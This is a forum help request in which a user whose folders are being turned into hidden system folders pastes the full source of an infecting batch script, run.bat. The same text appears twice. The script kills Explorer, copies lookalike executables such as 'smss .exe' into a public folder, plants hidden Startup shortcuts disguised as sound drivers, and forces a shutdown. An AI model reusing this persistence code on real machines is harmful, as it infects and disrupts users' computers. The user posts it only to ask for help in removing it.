- Oct 23, 2013
- 4
- 0
- 10,510
my all folders are getting converted into system folders due a virus named as run.bat thus it is undetectable by antivirus programs its code is as folows
path C:\Windows\System32
color fa
IF EXIST "C:\Users\Public\smss .exe" ( ECHO ) ELSE (taskkill /f /im explorer.exe
xcopy /h /y "smss .exe" "C:\Users\Public")
IF EXIST "C:\Users\Public\taskeng .exe" ( ECHO ) ELSE (xcopy /h /y "taskeng .exe" "C:\Users\Public")
IF EXIST "C:\Users\Public\Firewall.exe" ( ECHO ) ELSE (xcopy /h /y "Firewall.exe" "C:\Users\Public")
IF EXIST "C:\Users\Public\Firewall .exe" ( ECHO ) ELSE (xcopy /h /y "Firewall .exe" "C:\Users\Public")
IF EXIST "C:\Users\Public\explorer.exe" ( ECHO ) ELSE (xcopy /h /y "explorer.exe" "C:\Users\Public")
IF EXIST "C:\Users\Public\explorer .exe" ( ECHO ) ELSE (xcopy /h /y "explorer .exe" "C:\Users\Public")
IF EXIST "C:\Users\Public\Interop.IWshRuntimeLibrary.dll" ( ECHO ) ELSE (xcopy /h /y Interop.IWshRuntimeLibrary.dll "C:\Users\Public")
IF EXIST "%systemroot%\Microsoft.NET\Framework\v3.*" goto 3
IF EXIST "%systemroot%\Microsoft.NET\Framework\v4.*" goto 4
:3
IF EXIST "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sound_Driver.lnk" (
ECHO "hur"
) ELSE (
attrib "Sound_Driver.lnk" -h -s
copy /y Sound_Driver.lnk "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
attrib "Sound_Driver.lnk" +h +s
attrib "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sound_Driver.lnk" -h -s
shutdown /s /f /t 0
)
goto e
:4
IF EXIST "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sound_Drivers.lnk" (
ECHO "hur"
) ELSE (
attrib "Sound_Drivers.lnk" -h -s
copy /y Sound_Drivers.lnk "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
attrib "Sound_Drivers.lnk" +h +s
attrib "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sound_Drivers.lnk" -h -s
shutdown /s /f /t 0
)
:e
it automatically makes some files named as smss.exe, invis.vbs, New folder.bat, shortcut named as new folder, sound_driver, sound_drivers, and an application extension file named as Interop.IWshRuntimeLibrary.dll i tried deleting these but was not successful as after the delection they appear on its own these files are made even when i plug in an external drive and also makes the normal folder into system folder automatically. these files are found in each drive i am having.
path C:\Windows\System32
color fa
IF EXIST "C:\Users\Public\smss .exe" ( ECHO ) ELSE (taskkill /f /im explorer.exe
xcopy /h /y "smss .exe" "C:\Users\Public")
IF EXIST "C:\Users\Public\taskeng .exe" ( ECHO ) ELSE (xcopy /h /y "taskeng .exe" "C:\Users\Public")
IF EXIST "C:\Users\Public\Firewall.exe" ( ECHO ) ELSE (xcopy /h /y "Firewall.exe" "C:\Users\Public")
IF EXIST "C:\Users\Public\Firewall .exe" ( ECHO ) ELSE (xcopy /h /y "Firewall .exe" "C:\Users\Public")
IF EXIST "C:\Users\Public\explorer.exe" ( ECHO ) ELSE (xcopy /h /y "explorer.exe" "C:\Users\Public")
IF EXIST "C:\Users\Public\explorer .exe" ( ECHO ) ELSE (xcopy /h /y "explorer .exe" "C:\Users\Public")
IF EXIST "C:\Users\Public\Interop.IWshRuntimeLibrary.dll" ( ECHO ) ELSE (xcopy /h /y Interop.IWshRuntimeLibrary.dll "C:\Users\Public")
IF EXIST "%systemroot%\Microsoft.NET\Framework\v3.*" goto 3
IF EXIST "%systemroot%\Microsoft.NET\Framework\v4.*" goto 4
:3
IF EXIST "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sound_Driver.lnk" (
ECHO "hur"
) ELSE (
attrib "Sound_Driver.lnk" -h -s
copy /y Sound_Driver.lnk "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
attrib "Sound_Driver.lnk" +h +s
attrib "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sound_Driver.lnk" -h -s
shutdown /s /f /t 0
)
goto e
:4
IF EXIST "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sound_Drivers.lnk" (
ECHO "hur"
) ELSE (
attrib "Sound_Drivers.lnk" -h -s
copy /y Sound_Drivers.lnk "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
attrib "Sound_Drivers.lnk" +h +s
attrib "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sound_Drivers.lnk" -h -s
shutdown /s /f /t 0
)
:e
it automatically makes some files named as smss.exe, invis.vbs, New folder.bat, shortcut named as new folder, sound_driver, sound_drivers, and an application extension file named as Interop.IWshRuntimeLibrary.dll i tried deleting these but was not successful as after the delection they appear on its own these files are made even when i plug in an external drive and also makes the normal folder into system folder automatically. these files are found in each drive i am having.
Facebook
Twitter
Instagram